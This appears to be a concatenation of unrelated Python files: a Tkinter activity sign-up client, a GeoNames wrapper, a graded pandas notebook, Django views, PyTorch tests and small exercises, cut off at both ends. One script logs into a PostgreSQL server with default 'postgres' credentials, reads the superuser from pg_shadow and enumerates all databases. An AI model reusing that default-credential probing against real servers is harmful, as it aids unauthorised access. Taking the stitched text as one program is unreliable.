            self.uid = f.readline().rstrip()
    def login(self):
        """Return True when a usable session exists.

        If a.ini exists, validate the cached token (deleting the cache when
        it has expired); otherwise request a fresh token with the
        credentials typed into the entry widgets.
        get_token presumably writes a.ini for later read() calls --
        TODO confirm in the jiami module.
        """
        acc = entry_usr_name.get()
        pwd = entry_usr_pwd.get()
        if os.path.exists('a.ini'):
            if test_token():
                return True
            else:
                messagebox.showwarning(title='出错了', message='登录失效,请重新登录')
                os.remove('a.ini')
                return False
        else:
            if get_token(acc, pwd):
                return True
            else:
                messagebox.showwarning(title='出错了', message='请检查账号密码')
                return False
    def get_id(self):
        """Fetch this user's activities and list them in a Listbox."""
        self.get_ids(self.token, self.uid)
        messagebox.showinfo('欢迎您', self.name)
        names = []
        for name, id, statusText in zip(self.names, self.ids, self.statusTexts):
            names.append(name + ' {} {}'.format(id, statusText))
        list1 = StringVar(value=names)
        lb1 = tk.Listbox(app, listvariable=list1, height=len(names), width=67)
        lb1.place(x=6, y=65)
    def can_join(self):
        """Show activities still open for sign-up, or warn when there are none."""
        names = ['可报名活动']
        if self.get_can_join(self.token, self.uid):
            for name, id, statusText in zip(self.names, self.ids, self.statusTexts):
                names.append(name + ' {} {}'.format(id, statusText))
            list1 = StringVar(value=names)
            lb2 = tk.Listbox(app, listvariable=list1, height=len(names), width=67)
            lb2.place(x=500, y=245)
        else:
            messagebox.showwarning('出错了', '没有活动')
    def chiken(self):
        """Pop up a window with details of the activity id typed into id1."""
        id = id1.get()
        res = self.get_info(id, self.token, self.uid)
        if res:
            app1 = tk.Toplevel(app)
            app1.geometry('643x360')
            app1.title('详细信息')
            tk.Label(app1, text=res['data']['activityName'], font=('Arial', 14)).place(x=100, y=0)
            tk.Label(app1, text='活动名称', font=('Arial', 14)).place(x=0, y=0)
            tk.Label(app1, text=res['data']['address'], font=('Arial', 14)).place(x=100, y=25)
            tk.Label(app1, text='活动地址', font=('Arial', 14)).place(x=0, y=25)
            tk.Label(app1, text=res['data']['joindate'], font=('Arial', 14)).place(x=100, y=50)
            tk.Label(app1, text='报名时间', font=('Arial', 14)).place(x=0, y=50)
            tk.Label(app1, text=res['data']['startdate'], font=('Arial', 14)).place(x=100, y=75)
            tk.Label(app1, text='活动时间', font=('Arial', 14)).place(x=0, y=75)
            tk.Label(app1, text=res['data']['specialList'][0]['name'], font=('Arial', 14)).place(x=100, y=100)
            tk.Label(app1, text='积分类型', font=('Arial', 14)).place(x=0, y=100)
            tk.Label(app1, text=res['data']['specialList'][0]['unitcount'], font=('Arial', 14)).place(x=100, y=125)
            tk.Label(app1, text='积分数量', font=('Arial', 14)).place(x=0, y=125)
        else:
            messagebox.showwarning(title='出错了', message='查询失败,请检查活动id')
    def enter(self):
        """Sign up for the activity id typed into id2 and report the result."""
        id = id2.get()
        res = self.join(id, self.token, self.uid)
        if res:
            # Service convention (per this code): code '100' means success.
            if res['code'] == '100':
                messagebox.showinfo(title='报名详情', message='报名成功')
            else:
                messagebox.showinfo(title='报名详情', message=res['msg'])
        else:
            messagebox.showwarning(title='出错了', message='查询失败,请检查id')
    def get_joined(self):
        """List activities whose statusText is 报名中 (signed up) in a Listbox."""
        res = self.get_activity(self.token, self.uid)
        names = []
        ids = []
        heights = ['已报名活动']
        if res:
            for li in res['data']['list']:
                if li['statusText'] == '报名中':
                    names.append(li['name'])
                    ids.append(li['aid'])
        if names:
            for name, id in zip(names, ids):
                heights.append(name + ' {}'.format(id))
            list1 = StringVar(value=heights)
            # lb3 is stored on self so concle() can destroy it later.
            self.lb3 = tk.Listbox(app, listvariable=list1, height=len(heights), width=67)
            self.lb3.place(x=500, y=105)
        else:
            messagebox.showwarning('出错了', '没有已报名活动')
    def concle(self):
        """Cancel the sign-up for the activity id typed into id3."""
        id = id3.get()
        res = self.get_info(id, self.token, self.uid)
        if res:
            signUpId = str(res['data']['signUpId'])
            if self.get_cancle(signUpId, self.token, self.uid)['code'] == '100':
                messagebox.showinfo(title='成功', message='取消报名成功')
            else:
                messagebox.showwarning(title='出错了', message='失败,请检查活动id')
main = Main()
def login():
    """Log in (or reuse the cached session) and show the activity list."""
    if main.login():
        main.read()
        main.get_id()
    # BUG FIX: the else branch was a bare ``None`` expression statement,
    # which does nothing; it has been removed.
def chiken():
    """Show details for the queried activity id, after ensuring a session."""
    if not main.login():
        return
    main.read()
    main.chiken()
def join():
    """Sign up for an activity, after ensuring a session."""
    if not main.login():
        return
    main.read()
    main.enter()
def can_join():
    """List activities open for sign-up, after ensuring a session."""
    if not main.login():
        return
    main.read()
    main.can_join()
def joined():
    """List already-joined activities, after ensuring a session."""
    if not main.login():
        return
    main.read()
    main.get_joined()
def concle():
    """Cancel a sign-up, then remove the 'joined' listbox from the window."""
    if main.login():
        main.read()
        main.concle()
        # NOTE(review): main.lb3 only exists after get_joined() has run;
        # pressing this button first raises AttributeError here.
        main.lb3.destroy()
    else:
        pass
# Wire the wrapper functions above into buttons and start the event loop.
b = tk.Button(app, text='登录查询', font=('Arial', 12), width=10, height=1, command=login)
b.place(x=380, y=12.5)
b1 = tk.Button(app, text='活动信息查询', font=('Arial', 12), width=10, height=1, command=chiken)
b1.place(x=720, y=0)
b2 = tk.Button(app, text='报名活动', font=('Arial', 12), width=10, height=1, command=join)
b2.place(x=720, y=32)
# NOTE(review): the name b2 is reused here, shadowing the sign-up button
# variable above; harmless since the references are never used again.
b2 = tk.Button(app, text='退出活动', font=('Arial', 12), width=10, height=1, command=concle)
b2.place(x=720, y=64)
b3 = tk.Button(app, text='查询已报名活动', font=('Arial', 12), width=12, height=1, command=joined)
b3.place(x=850, y=10)
b4 = tk.Button(app, text='查询可报名活动', font=('Arial', 12), width=12, height=1, command=can_join)
b4.place(x=850, y=52)
app.mainloop()
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
# Open the demo storefront, locate the search box, then shut the browser down.
driver = webdriver.Chrome(executable_path='./chromedriver')
driver.get("http://tutorialsninja.com/demo/")
# BUG FIX: driver.close() used to run *before* find_element_by_name, so the
# element lookup was issued against an already-closed browser window.
search_field = driver.find_element_by_name("search")
driver.close()
import logging
from cached_property import cached_property
from django.conf import settings
import requests
logger = logging.getLogger(__name__)
# NOTE: geonames code adapted and extended from winthrop project; will need
# to be spun off into its own library at some point down ther oad
# Exception hierarchy: callers can catch GeoNamesError to cover both cases.
class GeoNamesError(Exception):
    '''Generic GeoNames response error'''
class GeoNamesUnauthorized(GeoNamesError):
    '''GeoNames unauthorized response (raised when username is not set)'''
class GeoNamesAPI:
    '''Minimal wrapper around GeoNames API. Currently supports simple
    searching by name and generating a uri from an id. Expects
    **GEONAMES_USERNAME** to be configured in django settings.'''
    api_base = 'http://api.geonames.org'
    # store country info on the *class* so it can be fetched once and shared
    _countries = None
    def __init__(self):
        self.username = getattr(settings, "GEONAMES_USERNAME", None)
    def call_api(self, method, params=None):
        '''Generic method to handle calling geonames api and raising
        an exception if an error occurred.

        :param method: API endpoint name, e.g. ``searchJSON``
        :param params: optional dict of query parameters; the configured
            username is always added
        :raises GeoNamesUnauthorized: if the service reports status code 10
        :raises GeoNamesError: for any other error status or a non-200
            HTTP response
        '''
        api_url = '/'.join([self.api_base, method])
        if params is None:
            params = {}
        params['username'] = self.username
        response = requests.get(api_url, params=params)
        logger.debug('GeoNames %s: %s %s, %0.2f sec',
                     method, response.status_code, response.reason,
                     response.elapsed.total_seconds())
        # BUG FIX: a non-200 response used to fall through and silently
        # return None, causing a confusing TypeError in callers that
        # subscript the result; raise an explicit error instead.
        if response.status_code != requests.codes.ok:
            raise GeoNamesError('GeoNames returned %s: %s'
                                % (response.status_code, response.reason))
        # Unfortunately geonames api returns 200 codes for what
        # should be errors, with message and status code in the response.
        # See exception documentation for list of codes
        # http://www.geonames.org/export/webservice-exception.html
        data = response.json()
        if 'status' in data:
            if data['status']['value'] == 10:
                raise GeoNamesUnauthorized(data['status']['message'])
            raise GeoNamesError(data['status']['message'])
        return data
    def search(self, query, max_rows=None, feature_class=None,
               feature_code=None, name_start=False):
        '''Search for places and return the list of results.

        :param query: search term
        :param max_rows: optional cap on the number of results
        :param feature_class: optional GeoNames feature class filter
        :param feature_code: optional GeoNames feature code filter
        :param name_start: when True, match names *starting with* query
            (useful for autocomplete) instead of a generic term search
        '''
        api_method = 'searchJSON'
        # username is filled in by call_api, so it is not duplicated here
        params = {}
        # optionally use name start filter (e.g. for autocomplete)
        if name_start:
            params['name_startsWith'] = query
        # otherwise, generic search term query
        else:
            params['q'] = query
        if max_rows is not None:
            params['maxRows'] = max_rows
        if feature_class is not None:
            params['featureClass'] = feature_class
        if feature_code is not None:
            params['featureCode'] = feature_code
        return self.call_api(api_method, params)['geonames']
    @classmethod
    def uri_from_id(cls, geonames_id):
        '''Convert a GeoNames id into a GeoNames URI'''
        return 'http://sws.geonames.org/%d/' % geonames_id
    @property
    def countries(self):
        '''Country information as returned by countryInfoJSON (fetched once
        per process and cached on the class).'''
        if GeoNamesAPI._countries is None:
            api_method = 'countryInfoJSON'
            GeoNamesAPI._countries = self.call_api(api_method)['geonames']
        return GeoNamesAPI._countries
    @cached_property
    def countries_by_code(self):
        '''Dictionary of country information keyed on two-letter code.'''
        return {country['countryCode']: country for country in self.countries}
    # def country_code(self):
    # http://api.geonames.org/countryCode?lat=47.03&lng=10.2&username=demo&type=json
|
# Print two short status messages, reusing one variable for both.
for message in ("This is a simple message",
                "This is an another simple message"):
    print(message)
#!/usr/bin/env python
# coding: utf-8
# ## Module 2
#
# #### In this assignment, you will work on movie data from IMDB.
# - The data includes movies and ratings from the IMDB website
# - Data File(s): imdb.xlsx
#
# #### Data file contains 3 sheets:
# - “imdb”: contains records of movies and ratings scraped from IMDB website
# - “countries”: contains the country (of origin) names
# - “directors”: contains the director names
# In[67]:
###########################################################
### EXECUTE THIS CELL BEFORE YOU TO TEST YOUR SOLUTIONS ###
###########################################################
# NOTE(review): the `imp` module is deprecated (removed in Python 3.12) and
# imp.load_compiled expects a byte-compiled (.pyc-style) file. If
# ./solutions.py is plain source this call fails with a bad-magic error and
# imp.load_source (or importlib) is needed -- confirm what the file contains.
import imp, os, sys
sol = imp.load_compiled("solutions", "./solutions.py")
sol.get_solutions("imdb.xlsx")
from nose.tools import assert_equal
# NOTE(review): pandas.util.testing is deprecated; modern pandas exposes
# these helpers under pandas.testing.
from pandas.util.testing import assert_frame_equal, assert_series_equal
# In[68]:
""" Q1:
Load and read the 'imdb.xlsx' file. Read the 'imdb' sheet into a DataFrame, df.
"""
import pandas as pd
# your code here
df = pd.read_excel('imdb.xlsx')
#xls = pd.ExcelFile('imdb.xlsx')
#df = xls.parse('imbd')
# In[69]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(df, sol.df)
print("Success!")
# In[70]:
""" Q2:
Store the dimensions of the DataFrame as a tuple in a variable called 'shape' and print it.
Hint: A tuple is made up of comma separated values inside parenthesis. e.g. (1, 2)
"""
# your codes here
shape = (df.shape)
print(shape)
# In[71]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_equal(shape, sol.shape)
print("Success!")
# In[72]:
df.head()
# In[73]:
""" Q3:
Store the column titles and the types of data in variables named 'columns' and 'dtypes', then print them.
"""
# your code here
#columns = (["movie_title"], ["director_id"], ["country_id"], ["content_rating"], ["title_year"], ["imdb_score"], ["gross"], ["duration"])
#columns = ["movie_title", "director_id", "country_id", "content_rating", "title_year", "imdb_score", "gross", "duration"]
columns = df.columns
dtypes = df.dtypes
print(columns)
print(dtypes)
# In[74]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_equal(columns.all(), sol.columns.all())
assert_series_equal(dtypes, sol.dtypes)
print("Success!")
# In[75]:
""" Q4:
Examine the first 10 rows of data; store them in a variable called first10
"""
# your code here
first10 = df.head(10)
print(first10)
# In[76]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(first10, sol.first10)
print("Success!")
# In[77]:
""" Q5:
Examine the first 5 rows of data; store them in a variable called first5
"""
# your code here
first5 = df.head(5)
print(first5)
# In[78]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(first5, sol.first5)
print("Success!")
# In[79]:
""" Q6:
Import the "directors" and "countries" sheets into their own DataFrames, df_directors and df_countries.
"""
# your code here
df_directors = pd.read_excel (r'imdb.xlsx', sheet_name='directors')
print (df_directors)
df_countries = pd.read_excel (r'imdb.xlsx', sheet_name = 'countries')
print(df_countries)
# In[80]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(df_directors, sol.df_directors)
assert_frame_equal(df_countries, sol.df_countries)
print("Success!")
# In[81]:
""" Q7:
Check the "directors" sheet
1. Count how many records there are based on the "id" column. (To get the number of records per "id",
use the value_counts method.) Store the result in a variable named count.
2. Remove the duplicates from the directors dataframe and store the result in a variable called df_directors_clean.
"""
# your code here
# In[82]:
count = df_directors["id"].value_counts()
print(count)
# In[83]:
df_directors.head()
# In[84]:
# Duplicates are identified by director_name only.
df_directors_clean = df_directors.drop_duplicates(subset =["director_name"])
df_directors_clean.head()
# In[85]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_series_equal(count, sol.count)
assert_frame_equal(df_directors_clean, sol.df_directors_clean)
print("Success!")
# In[ ]:
|
def magical_string(n):
    """Count the '1' characters among the first n elements of the magical string."""
    return string_gen(n).count('1')
def string_gen(n):
    """Generate the first n characters of the magical string 1221121221...

    The sequence describes its own run lengths: the value at the read
    pointer gives how many copies of the next alternating symbol to append.
    For n <= 3 a prefix of the seed '122' is returned directly.
    """
    s = '122'
    read = 2        # position whose digit gives the next run length
    symbol = '1'    # next symbol to append; alternates '1' <-> '2'
    while len(s) < n:
        run = 2 if s[read] == '2' else 1
        s += symbol * run
        symbol = '2' if symbol == '1' else '1'
        read += 1
    return s[:n]
# -*- coding: utf-8 -*-
'''
Created on 9 may. 2017
@author: jose
'''
import psycopg2
import time
def consulta(conn, sql):
    """Run *sql* on DB-API connection *conn* and return all result rows."""
    cursor = conn.cursor()
    cursor.execute(sql)
    return cursor.fetchall()
def ObtieneTipoTabla(tipo):
    """Map a pg_class relkind code to a label: 'TBL' for ordinary tables
    ('r'), 'VST' for everything else (views etc.)."""
    return 'TBL' if tipo == 'r' else 'VST'
def obtenerPrincipal(ip, user, password, port):
    """Collect server-level info: version, superuser name and database list.

    Returns (dic, lbd): dic holds 'version', 'admin' and an empty 'Esquema'
    list; lbd is a list of (database, owner) rows. On connection failure an
    error is printed and empty results are returned.
    """
    dic = {}
    # BUG FIX: lbd was only assigned inside the try block, so a failed
    # connection raised NameError at the return statement instead of
    # returning cleanly.
    lbd = []
    try:
        conn = psycopg2.connect(user=user, password=password, host=ip, port=port)
        buf = consulta(conn, "select version()")
        dic['version'] = buf[0][0].split(',')[0]
        buf = consulta(conn, "SELECT user from pg_shadow where usesuper='t';")
        dic['admin'] = buf[0][0]
        dic['Esquema'] = []
        lbd = consulta(conn, "select d.datname,u.usename from pg_database d,pg_user u where u.usesysid=d.datdba")
        conn.close()
    except Exception:
        print (time.strftime("%c")+"-- Error al conectar a la instancia de BBDD en la IP "+ ip)
    return dic, lbd
def compruebaConexion(ip, puerto):
    """Probe whether a PostgreSQL server answers at ip:puerto.

    Connecting with dummy credentials normally fails with OperationalError
    (authentication error), which still proves a server is listening, so it
    counts as success, mirroring the original logic. Any other error counts
    as failure.
    NOTE(review): OperationalError also covers "connection refused", so the
    heuristic can report True for an unreachable server -- confirm intent.
    """
    try:
        conn = psycopg2.connect(user="u", password="p", host=ip, port=puerto)
        # BUG FIX: if the dummy credentials unexpectedly succeed, Correcto
        # was never assigned and the return raised NameError.
        conn.close()
        Correcto = True
    except psycopg2.OperationalError:
        Correcto = True
    except Exception:
        Correcto = False
    return Correcto
def descubre(ip,user,password,port):
    """Crawl every database on the server and return a nested dict:
    {'version', 'admin', 'Esquema': [{'nombre_db', 'nombre', 'propietario',
    'Tablas': [{'nombre', 'tipo', 'attTabla': [{'nombre', 'indice'}]}]}]}.
    Databases that cannot be opened are logged and skipped.
    """
    dic,lbd=obtenerPrincipal(ip,user,password,port)
    dic['Esquema']=[]
    for bd in lbd:
        d={}
        try :
            conn = psycopg2.connect( database=bd[0],user=user, password=password, host=ip, port=port)
        except :
            print (time.strftime("%c")+"-- Error de acceso a la instancia de BBDD " + bd[0])
            continue
        # All user schemas (system catalogs excluded).
        sql = "select distinct table_schema from information_schema.columns WHERE table_schema not in ( 'pg_catalog', 'information_schema')"
        leqm= consulta(conn, sql)
        for eqm in leqm :
            d['nombre_db']=bd[0]
            d['nombre']=eqm[0]
            d['propietario']=bd[1]
            d['Tablas']=[]
            # Relations that are not indexes ('i'), TOAST tables ('t') or
            # sequences ('S').
            # NOTE(review): schema/table names are concatenated into the SQL
            # strings below; they come from the catalog itself, but
            # parameterized queries would still be safer.
            sql= "SELECT c.relname, (c.relkind ) FROM pg_class c LEFT JOIN pg_namespace n ON n.oid = c.relnamespace where c.relkind not in ('i','t','S') and n.nspname='" +eqm[0]+"'"
            l_tb=consulta(conn,sql)
            for tb in l_tb:
                t={}
                t['nombre']=tb[0]
                t['tipo']= ObtieneTipoTabla(tb[1])
                sql="SELECT DISTINCT column_name, data_type from information_schema.columns where table_schema ='"+eqm[0]+"' and table_name='"+tb[0]+"'"
                l_at=consulta(conn,sql)
                t['attTabla']=[]
                for at in l_at:
                    a={}
                    a['nombre']= at[0]
                    # Index detection is not implemented; always 'False'.
                    a['indice']='False'
                    t['attTabla'].append(a.copy())
                d['Tablas'].append(t.copy())
            dic['Esquema'].append(d.copy())
        conn.close()
    return dic
if __name__ == '__main__':
    # Ad-hoc smoke test against a local server; credentials are hard-coded.
    descubre("192.168.1.20","postgres","postgres", 5432)
    pass
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.contrib.staticfiles import finders
import os
import urllib2 # the lib that handles the url stuff
def index(request):
    """Plain-text placeholder view for the app root."""
    return HttpResponse("Hello, world. You're at the polls index.")
# Create your views here.
def search_form(request):
    """Render the postcode search form template."""
    #return HttpResponse("search_form.")
    return render(request, 'search_form.html')
def search_postcode(request):
    """Look up schools matching the 'postcode' GET parameter in a bundled
    tab-separated data file (Python 2 view: matches are printed to the
    console; the HTTP response is a placeholder)."""
    if 'postcode' in request.GET:
        postcode = request.GET['postcode']
        print "school function"
        #print postcode
        #url_file = static('Government-School-Locations.txt')
        #print url_file
        #data = urllib2.urlopen('https://github.com/ronniels92372/govhack2016/blob/master/Government-School-Locations.txt')
        result = finders.find('Government-School-Locations.txt')
        searched_locations = finders.searched_locations
        #print searched_locations
        # NOTE(review): hard-codes index 1 of the static-finder search
        # locations -- fragile if STATICFILES_DIRS ever changes.
        file_path = os.path.join(searched_locations[1],'Government-School-Locations.txt')
        with open(file_path) as f:
            # Two readline() calls: skip two header lines before the data rows.
            first_line = f.readline()
            print first_line
            first_line = f.readline()
            lines = f.readlines()
            for each_line in lines:
                cols = each_line.split("\t")
                school_name_col = cols[2]
                postcode_col = cols[19]
                total_enrollments = cols[10]
                lat = cols[20]
                long = cols[21]  # NOTE(review): shadows the Python 2 built-in `long`
                if(str(postcode) == postcode_col):
                    print "---------------------"
                    print postcode_col
                    print school_name_col
                    print total_enrollments
                    print lat
                    print long
    return HttpResponse("POST CODE.")
    #return render(request, 'search_form.html')
|
import unittest
import math
import copy
from model.basic_operation import *
class TestAtma(unittest.TestCase):
    """Tests for atma(): for this fixture the expected output equals
    mat.T @ mat, both for a single 2x2 matrix and a batched (1, 2, 2) input."""
    def setUp(self) -> None:
        self.mat = torch.tensor([[1.0, 1.0], [0.0, 1.0]])
        self.batch_mat = self.mat.unsqueeze(0)  # add a leading batch dim
        self.result = [[1.0, 1.0], [1.0, 2.0]]
    def test_mat_multiply(self):
        numpy_multi_result = atma(self.mat).cpu().numpy().tolist()
        self.assertListEqual(self.result, numpy_multi_result)
    def test_batch_mat_multiply(self):
        numpy_multi_result = atma(self.batch_mat).numpy().tolist()
        self.assertListEqual([self.result], numpy_multi_result)
class TestCalculateZeta(unittest.TestCase):
    """calculate_zeta must yield the same log-normalizer whether the Gaussian
    is passed as a mean (mu) or a covariance (sig); here lam is the
    precision (1/sigma) and eta = lam * mu."""
    def setUp(self) -> None:
        self.mu = torch.tensor([0.5])
        self.sigma = torch.tensor([[2.0]])
        self.lam = torch.tensor([[0.5]])
        # eta = lam * mu
        self.eta = torch.tensor([0.25])
    def test_one_dim_zeta_with_mu(self):
        zeta = float(calculate_zeta(self.eta, self.lam, mu=self.mu).numpy())
        self.assertAlmostEqual(zeta, -1.32801212348)
    def test_one_dim_zeta_with_sigma(self):
        zeta = float(calculate_zeta(self.eta, self.lam, sig=self.sigma).numpy())
        self.assertAlmostEqual(zeta, -1.32801212348)
class TestGaussianMulti(unittest.TestCase):
    """Product of two 1-D Gaussians N(0.5, 2) * N(1/3, 1); the expected
    sigma (2/3), mu (7/18) and log-scale score are the closed-form
    product-of-Gaussians values."""
    def setUp(self) -> None:
        self.mu0 = torch.tensor([0.5])
        self.sigma0 = torch.tensor([[2.0]])
        self.mu1 = torch.tensor([1.0 / 3.0])
        self.sigma1 = torch.tensor([[1.0]])
    def test_one_dim_multiply(self):
        score, mu, sigma = gaussian_multi(self.mu0, self.mu1, self.sigma0, self.sigma1)
        self.assertAlmostEqual(sigma.item(), 2.0 / 3.0)
        self.assertAlmostEqual(mu.item(), 7.0 / 18.0)
        self.assertAlmostEqual(score.item(), - (0.5 * math.log(6 * math.pi) + 1.0 / 216.0))
class TestFastGaussianMulti(unittest.TestCase):
    """fast_gaussian_multi with both diagonal flags set must reproduce the
    same closed-form values as TestGaussianMulti for the identical inputs."""
    def setUp(self) -> None:
        self.mu0 = torch.tensor([0.5])
        self.sigma0 = torch.tensor([[2.0]])
        self.mu1 = torch.tensor([1.0 / 3.0])
        self.sigma1 = torch.tensor([[1.0]])
    def test_one_dim_multiply(self):
        score, mu, sigma = fast_gaussian_multi(self.mu0, self.mu1, self.sigma0, self.sigma1, diag0=True, diag1=True)
        self.assertAlmostEqual(sigma.item(), 2.0 / 3.0)
        self.assertAlmostEqual(mu.item(), 7.0 / 18.0)
        self.assertAlmostEqual(score.item(), - (0.5 * math.log(6 * math.pi) + 1.0 / 216.0))
class TestGaussianMultiIntegral(unittest.TestCase):
    """gaussian_multi_integral against golden values computed with numpy
    natural-parameter (eta/lambda) arithmetic: the 1-D factor is folded into
    the first dimension of the 2-D Gaussian (forward=True) or the last
    (forward=False), and the remaining marginal plus log-score is checked."""
    def setUp(self) -> None:
        self.mu0 = torch.tensor([0.5])
        self.sigma0 = torch.tensor([[2.0]])
        self.mu1 = torch.tensor([1.0, 2.0])
        self.sigma1 = torch.tensor([[1.0, 0.5], [0.5, 1.0]])
    def test_one_dim_forward(self):
        score, mu, sigma = gaussian_multi_integral(self.mu1, self.mu0, self.sigma1, self.sigma0, forward=True)
        # lam = np.array([[4.0 / 3.0, -2.0 / 3.0], [-2.0 / 3.0, 4.0 / 3.0]])
        lam1 = np.linalg.inv(self.sigma1.detach().numpy())
        lam = copy.copy(lam1)
        # forward: the 1-D precision is added to the first dimension.
        lam[0][0] += 1.0 / self.sigma0.item()
        golden_sigma = np.linalg.inv(lam)
        self.assertAlmostEqual(golden_sigma[1][1], sigma.item())
        eta0 = 1.0 / self.sigma0.item() * self.mu0.item()
        eta1 = lam1.dot(self.mu1.detach().numpy())
        eta = copy.copy(eta1)
        eta[0] += eta0
        golden_mu = golden_sigma.dot(eta)
        self.assertAlmostEqual(golden_mu[1], mu.item())
        # zeta* are the Gaussian log-normalizers of factor, input and product.
        zeta0 = -0.5 * (math.log(2 * math.pi) - np.log(1.0 / self.sigma0.item()) + eta0 * self.sigma0.item() * eta0)
        zeta1 = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam1)) + eta1.dot(self.sigma1.detach().numpy().dot(eta1)))
        zeta = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam)) + eta.dot(golden_sigma.dot(eta)))
        golden_score = zeta0 + zeta1 - zeta
        self.assertAlmostEqual(golden_score, score.item(), 6)
    def test_one_dim_backward(self):
        score, mu, sigma = gaussian_multi_integral(self.mu1, self.mu0, self.sigma1, self.sigma0, forward=False)
        lam1 = np.linalg.inv(self.sigma1.detach().numpy())
        lam = copy.copy(lam1)
        # backward: the 1-D precision is added to the last dimension.
        lam[1][1] += 1.0 / self.sigma0.item()
        golden_sigma = np.linalg.inv(lam)
        self.assertAlmostEqual(golden_sigma[0][0], sigma.item(), 6)
        eta0 = 1.0 / self.sigma0.item() * self.mu0.item()
        eta1 = lam1.dot(self.mu1.detach().numpy())
        eta = copy.copy(eta1)
        eta[1] += eta0
        golden_mu = golden_sigma.dot(eta)
        self.assertAlmostEqual(golden_mu[0], mu.item(), 6)
        zeta0 = -0.5 * (math.log(2 * math.pi) - np.log(1.0 / self.sigma0.item()) + eta0 * self.sigma0.item() * eta0)
        zeta1 = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam1)) + eta1.dot(
            self.sigma1.detach().numpy().dot(eta1)))
        zeta = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam)) + eta.dot(golden_sigma.dot(eta)))
        golden_score = zeta0 + zeta1 - zeta
        self.assertAlmostEqual(golden_score, score.item(), 6)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
import csv
from .models import FinancialData, StatsData
def import_financial_data(request):
    """Load monthly financial figures for FY 2013 from a CSV and store one
    FinancialData row per month (month id = 1-based CSV row order).

    NOTE(review): the CSV path is an absolute, machine-specific path, and
    `request` is unused -- this looks like a one-off import helper.
    """
    available_data = []
    # Each CSV row becomes {month: {header: value}}.
    with open('/Users/Hannan/Documents/Projects/analytics_assistant/virtual_analyst/static/csv/2013.csv', 'r') as f:
        rows = csv.reader(f)
        headers = next(rows)
        for row in rows:
            monthly_dict = {}
            month = row[0]
            monthly_data = dict(zip(headers[1:], row[1:]))
            monthly_dict[month] = monthly_data
            available_data.append(monthly_dict)
    month_counter = 0
    for row in available_data:
        for key, value in row.items():
            month_counter += 1
            # NOTE(review): without a defaults= argument every field below is
            # part of the lookup, so changed figures create new rows rather
            # than updating existing ones -- confirm intended.
            FinancialData.objects.update_or_create(
                financial_year_id=5,
                financial_month_id=month_counter,
                passenger_revenue=value['Passenger Revenue'],
                cargo_revenue=value['Cargo Revenue'],
                other_revenue=value['Other Revenue'],
                aircraft_fuel=value['Fuel'],
                aircraft_maintenance=value['Maintenance'],
                commissions=value['Commission'],
                ground_handling=value['Ground Handling'],
                salaries_wages=value['Salaries and Wages'],
                aircraft_lease=value['Aircraft Lease'],
                overheads=value['Overheads'],
                non_operating_items=value['Non-Operating']
            )
def import_stats_data(request):
    """Load monthly operating statistics for FY 2013 from a CSV and create
    one StatsData row per month (month id = 1-based CSV row order).

    NOTE(review): the CSV path is an absolute, machine-specific path, and
    `request` is unused; re-running this creates duplicate rows since
    objects.create is used.
    """
    available_data = []
    # Each CSV row becomes {month: {header: value}}.
    with open('/Users/Hannan/Documents/Projects/analytics_assistant/virtual_analyst/static/csv/2013_stats.csv', 'r') as f:
        rows = csv.reader(f)
        headers = next(rows)
        for row in rows:
            monthly_dict = {}
            month = row[0]
            monthly_data = dict(zip(headers[1:], row[1:]))
            monthly_dict[month] = monthly_data
            available_data.append(monthly_dict)
    month_counter = 0
    for row in available_data:
        for key, value in row.items():
            month_counter += 1
            StatsData.objects.create(
                financial_year_id=5,
                financial_month_id=month_counter,
                block_hours=value['Block Hours'],
                flight_hours=value['Flight Hours'],
                departures=value['Departures'],
                rev_pax_miles=value['RPMs'],
                avail_seat_miles=value['ASMs'],
                fuel_gallons=value['Gallons'],
            )
|
def hardestProblem(a, b, c):
    """Print 'Alice' when c is the strict minimum of (a, b, c), 'Bob' when
    b is, and 'Draw' otherwise."""
    if c < min(a, b):
        print('Alice')
    elif b < min(a, c):
        print('Bob')
    else:
        print('Draw')
try:
    # Read the number of test cases, then one "a b c" triple per case.
    t = int(input())
    while t>0:
        t -= 1
        a, b, c = map(int, input().split())
        hardestProblem(a, b, c)
except:
    # Competitive-programming style: swallow EOF/parse errors at end of input.
    pass
|
# Scratch rotation script: build `output` from `a` by taking a[i + c] while
# i <= c and a[i - b] afterwards (a itself is left unchanged).
a = [3, 8, 9, 7, 6]
b = 3
c = b - 1  # 2
print(len(a))
output = [a[i + c] if i <= c else a[i - b] for i in range(len(a))]
print(a)
print(output)
|
from ortools_op import SolveMaxMatching
import numpy as np
def results2objective(results, nworkers, ntasks):
    """Build an (nworkers, ntasks) 0/1 assignment matrix from (worker, task) pairs."""
    objective = np.zeros([nworkers, ntasks])
    for worker, task in results:
        objective[worker][task] = 1
    return objective
def test1():
    '''
    Smoke test: solve a random 5x6 assignment with SolveMaxMatching and print
    the unary potentials and resulting 0/1 objective. Input is random, so the
    printed values vary between runs; the docstring below shows one example.

    Results :
    unary potential :
    [[ 0.89292312 0.64831936 0.56726688 0.13208358 0.05779465 0.48978515]
    [ 0.83382476 0.08014071 0.61772549 0.95149459 0.04179085 0.92253984]
    [ 0.76766159 0.6634347 0.91049119 0.6748744 0.17438728 0.51890275]
    [ 0.90997762 0.18447894 0.81440657 0.09081913 0.46642204 0.47917976]
    [ 0.72631254 0.94356716 0.05386514 0.57434492 0.69070927 0.39979905]]
    objective :
    [[ 1. 1. 0. 0. 0. 0.]
    [ 0. 0. 0. 1. 0. 1.]
    [ 0. 0. 1. 1. 0. 0.]
    [ 1. 0. 1. 0. 0. 0.]
    [ 0. 1. 0. 0. 1. 0.]]
    '''
    pairwise_lamb = 0.1
    nworkers = 5
    ntasks = 6
    k = 2
